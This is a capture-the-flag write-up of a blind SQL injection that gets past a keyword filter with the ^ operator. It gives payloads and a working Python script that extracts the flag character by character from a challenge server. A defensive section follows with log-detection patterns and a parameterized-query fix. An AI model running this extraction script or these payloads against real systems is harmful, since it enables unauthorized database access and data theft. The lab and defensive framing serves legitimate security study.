Key points
Blind injection
Bypassing the space filter
Solution
First, it turns out that a lot is filtered: union, limit, ord, and, xor, information_schema, -, &, #, *, ||.
^ is not filtered. Sending the parameter 10 returns a normal page, while 11 returns an error.
Next, try injecting: sending 0^(ascii(substr((select(database())),1,1))>0) returns the normal page, which also confirms that the injection exists. The challenge states that the flag is in the flag column of the flag table, so a script can brute-force it character by character.
import requests

url = 'http://808a4f11-2371-4c63-a2f8-cc9d86102282.node3.buuoj.cn/index.php'
# 0^1 returns "glzjin wants a girlfriend" (the normal page)
# 0^0 returns false (the response body contains "Error")

flag = ''
for i in range(1, 50):
    # Binary search over printable ASCII (32..126) for the i-th character.
    low = 32
    high = 126
    mid = (low + high) // 2
    print(flag)
    while low < high:
        payload = f"0^(ascii(substr((select(flag)from(flag)),{i},1))>{mid})"
        # print(payload)
        data = {
            'id': payload
        }
        r = requests.post(url=url, data=data)
        # print(r.text)
        if 'glzjin wants a girlfriend' in r.text:
            # Condition true: the character is greater than mid.
            low = mid + 1
        if 'Error' in r.text:
            # Condition false: the character is at most mid.
            high = mid
        mid = (low + high) // 2
        if low == high:
            flag = flag + chr(low)
            break
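From the defender's side, the two lessons of this challenge are that a keyword denylist is not a fix (the ^ operator was simply not on the list) and that a boolean-blind extraction leaves a very recognisable trace: roughly seven requests per character, each carrying function calls and comparison operators in a parameter that should only ever be an integer. The following added example, which is not part of the original writeup, shows both a detection pass over constructed request log lines and a hardened lookup that validates the id as an integer and binds it as a query parameter. The log format, the client IPs, the users table and the function names are all assumptions made for the example; SQLite is used only so the block runs offline.

```python
import re
import sqlite3
from collections import Counter

# Constructed sample request log lines (not from the original challenge):
# one benign lookup and three probes shaped like the writeup's payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00] "POST /index.php" id=10',
    '10.0.0.9 - - [01/Jan/2024:10:00:01] "POST /index.php" id=0^(ascii(substr((select(database())),1,1))>0)',
    '10.0.0.9 - - [01/Jan/2024:10:00:02] "POST /index.php" id=0^(ascii(substr((select(flag)from(flag)),1,1))>79)',
    '10.0.0.9 - - [01/Jan/2024:10:00:03] "POST /index.php" id=0^(ascii(substr((select(flag)from(flag)),1,1))>103)',
]

# A plain non-negative integer is the only legitimate shape for this parameter.
NUMERIC_ID = re.compile(r"^\d+$")
# SQL function calls and comparison/arithmetic operators never belong in an integer id.
SUSPICIOUS = re.compile(r"(ascii|substr|select)\s*\(|[\^<>=]", re.IGNORECASE)


def extract_id(line):
    """Pull the raw id= value out of one log line (None if absent)."""
    m = re.search(r"\bid=(\S+)", line)
    return m.group(1) if m else None


def classify(line):
    """Return 'benign', 'suspicious', 'malformed', or None when there is no id."""
    value = extract_id(line)
    if value is None:
        return None
    if NUMERIC_ID.match(value):
        return "benign"
    return "suspicious" if SUSPICIOUS.search(value) else "malformed"


def detect(lines):
    """Count suspicious id values per client IP. A binary search over the
    printable ASCII range costs about seven requests per extracted character,
    so even a short burst from one source stands out in this counter."""
    hits = Counter()
    for line in lines:
        if classify(line) == "suspicious":
            hits[line.split()[0]] += 1
    return dict(hits)


def make_db():
    """Assumed schema for the example: an in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO users VALUES (10, 'glzjin')")
    return conn


def lookup_hardened(conn, raw_id):
    """Reject anything that is not a plain integer before it reaches the
    database, then bind the value as a parameter so the driver never lets
    the database parse it as SQL. Both layers are needed: validation keeps
    the attack surface small, binding makes the query shape fixed."""
    if not NUMERIC_ID.match(raw_id):
        raise ValueError("id must be a non-negative integer")
    row = conn.execute("SELECT name FROM users WHERE id = ?", (int(raw_id),)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), extract_id(line))
    print(detect(SAMPLE_LOG))
    db = make_db()
    print(lookup_hardened(db, "10"))
```

Running the block flags the three probe lines and attributes them to one client, while the hardened lookup returns the row for 10, None for 11, and raises for the writeup's payload before any SQL is executed. In a real deployment the per-source counter would be windowed by time, and the validation would live at the request-parsing layer rather than next to the query.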